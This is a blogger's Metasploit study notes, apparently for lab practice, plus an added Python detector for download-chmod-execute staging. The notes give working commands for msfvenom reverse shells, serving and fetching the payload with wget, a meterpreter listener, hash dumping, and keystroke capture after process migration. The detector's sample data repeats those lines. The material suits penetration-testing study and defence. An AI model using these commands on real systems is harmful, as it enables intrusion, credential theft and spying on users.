aldern00b

Understanding Metasploit

MSFCONSOLE

Finding Modules

Let's use port scanning as an example:

search portscan

pick a scanner:

use # <-- replace # with the number shown to the left of the module in the search results

then use

show options

to see what options are available for your choice. Set your options (for example):

set RHOSTS 10.10.12.148

Some modules support multiple payloads. After changing the payload, run show options again, because the available options may change.

show payloads <-- Show the available payloads
set payload # <-- choose which payload to use.

Setting up a project database

Before you start msfconsole:

systemctl start postgresql
msfdb init

Start msfconsole then check

db_status

Working with workspaces (workspace -h):

workspace <-- lists workspaces
workspace -a timmy <-- creates a new workspace named timmy
workspace default <-- switches from timmy back to the default workspace
workspace -d timmy <-- deletes the workspace called timmy

Once you're in a workspace, use 'help' to see what you can do and what gets stored in that database. For example, running 'db_nmap -sV -p- 10.10.12.229' runs an nmap scan and stores all the results in the database so you can recall them later.

hosts -h / services -h <-- help for each command
hosts <-- shows all the hosts it found
services <-- shows all the services it found for those hosts
services -S netbios <-- shows the service for just netbios
hosts -R <-- sets the discovered hosts as RHOSTS in all modules. If there is more than one host, all of them are set as the RHOSTS option.

Working with Sessions

sessions <-- see your sessions
sessions -i # <-- interact with the numbered session
ctrl+z <-- background a session
ctrl+c <-- exit a session

Accept Incoming Shells

use exploit/multi/handler <-- catches shells used in metasploit

An example usage:

use exploit/multi/handler
set payload php/reverse_php 
set lhost 10.10.24.119
set lport 7777
show options
run

MSFVENOM

This lets you create payloads; it's a standalone companion tool that ships alongside metasploit.

msfvenom -l payloads <-- list all the payloads
msfvenom -l payloads | grep "linux/x86" | grep "reverse_tcp" <-- search for a linux payload that gives us a reverse tcp connection
msfvenom -l formats <-- list supported output formats
-e <encoder> <-- encodes the payload (this is encoding, not obfuscation)
msfvenom -p php/reverse_php LHOST=10.0.2.19 LPORT=7777 -f raw > reverse_shell.php <-- example php reverse shell ** NOTE you will need to add the PHP tags to this, be sure to edit after.

An Example

We have access to a device to upload a file, it's a linux system.

First, we create a reverse shell on our attack box using msfvenom

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f elf > rev_shell.elf

Next we host it on a python web server on our attack box

python3 -m http.server 9000

We download the file on the vulnerable linux box

wget http://[ATTACK-BOX]:9000/rev_shell.elf

We set it as executable

chmod +x rev_shell.elf

We run the .elf file on the vulnerable linux box

./rev_shell.elf

Switching back over to our attack box we start msfconsole and start the listener.

msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST [ATTACK-BOX-IP]
set LPORT 4444
run

This should catch our reverse shell. Now that we have a shell, we background it with ctrl+z, taking note of the session number. We then search for a module to use; in this example we're going to dump hashes:

search linux hashes
use 0
set session 2
exploit
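The walkthrough above is, from the blue-team side, a very recognisable chain: a file is downloaded with wget or curl, made executable with chmod, and then run from the current directory or an absolute path. The following Python script is an added example (not part of the original post, and not a metasploit feature) that flags that sequence in a per-host list of executed command lines, such as bash history or an auditd execve feed. The host names, IP addresses and command lines in SAMPLE_COMMANDS are constructed for the example; the function names (downloaded_file, chmod_exec_target, executed_file, find_staging_chains) are this example's own.

```python
# Added example: detect the "download -> chmod +x -> execute" staging chain
# in a stream of executed command lines. Not from the original post.
import os.path
import re
from collections import defaultdict

# Constructed sample: (host, command line) pairs in execution order.
SAMPLE_COMMANDS = [
    ("web01", "ls -la"),
    ("web01", "wget http://10.10.24.119:9000/rev_shell.elf"),
    ("web01", "chmod +x rev_shell.elf"),
    ("web01", "./rev_shell.elf"),
    ("db01", "curl -o /tmp/update.bin http://10.10.24.119:9000/update.bin"),
    ("db01", "chmod 755 /tmp/update.bin"),
    ("db01", "/tmp/update.bin"),
    ("app01", "wget https://example.com/notes.txt"),
    ("app01", "cat notes.txt"),
]

CHMOD_RE = re.compile(r"^chmod\s+(\S+)\s+(\S+)")


def downloaded_file(cmd):
    """Return the local file name a wget/curl command writes, or None.
    Handles 'wget URL', 'wget -O file URL' and 'curl -o file URL'."""
    parts = cmd.split()
    if not parts or parts[0] not in ("wget", "curl"):
        return None
    for flag in ("-O", "-o"):
        if flag in parts:
            idx = parts.index(flag)
            if idx + 1 < len(parts):
                return os.path.basename(parts[idx + 1])
    for tok in parts[1:]:
        if "://" in tok:
            return os.path.basename(tok.split("?")[0])
    return None


def chmod_exec_target(cmd):
    """Return the file name if the chmod adds execute permission, else None."""
    m = CHMOD_RE.match(cmd)
    if not m:
        return None
    mode, path = m.groups()
    symbolic_exec = "+" in mode and "x" in mode          # e.g. +x, u+x
    octal_exec = mode.isdigit() and any(int(d) & 1 for d in mode[-3:])  # 7xx, 5xx
    if symbolic_exec or octal_exec:
        return os.path.basename(path)
    return None


def executed_file(cmd):
    """Return the file name when the command runs a file by relative or absolute path."""
    parts = cmd.split()
    if not parts:
        return None
    first = parts[0]
    if first.startswith("./") or first.startswith("/"):
        return os.path.basename(first)
    return None


def find_staging_chains(commands):
    """Return [(host, file, [download_cmd, chmod_cmd, exec_cmd])] for every
    file that was downloaded, made executable and then run on the same host.
    Files are matched by base name, so '/tmp/x' and 'x' are treated alike."""
    state = defaultdict(dict)  # host -> file -> list of (stage, command)
    hits = []
    for host, cmd in commands:
        cmd = cmd.strip()
        f = downloaded_file(cmd)
        if f:
            state[host].setdefault(f, []).append(("download", cmd))
            continue
        f = chmod_exec_target(cmd)
        if f and f in state[host]:
            state[host][f].append(("chmod", cmd))
            continue
        f = executed_file(cmd)
        if f and f in state[host]:
            stages = [s for s, _ in state[host][f]]
            if "download" in stages and "chmod" in stages:
                state[host][f].append(("execute", cmd))
                hits.append((host, f, [c for _, c in state[host][f]]))
    return hits


if __name__ == "__main__":
    for host, fname, steps in find_staging_chains(SAMPLE_COMMANDS):
        print(f"[{host}] staged executable {fname}:")
        for step in steps:
            print("    ", step)
```

On the constructed sample the detector reports web01 (the elf from the walkthrough) and db01 (the same pattern via curl and an octal mode), and stays quiet on app01, where a file is downloaded but never made executable. A benign software install can trip the same rule, so in practice the hit is a triage signal to pair with the outbound connection the executed file makes to the listener port.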


METERPRETER

Meterpreter runs in memory as a process on the target system and communicates over an encrypted TLS channel, acting as the agent in a command and control architecture.


Always run the help menu to see the available commands. Each meterpreter shell differs depending on the target system and the payload it uses. Here are a few commands that might be useful:


getuid <-- see which user you're running as.
hashdump <-- dump the SAM database hashes
search -f flag.txt <-- searches for a file named flag.txt
shell <-- get a cmd shell (ctrl+z will bring you back)
load python <-- loads python modules, can also use others like kiwi (mimikatz), etc

Migrating your meterpreter process into another application can sometimes be useful (just note that you may lose your privileges). For example, say we list the running processes with ps and see Word there; we migrate into that process and start capturing keystrokes:

ps
migrate 1276
keyscan_start
keyscan_stop
keyscan_dump


©2022 by AlderN00b.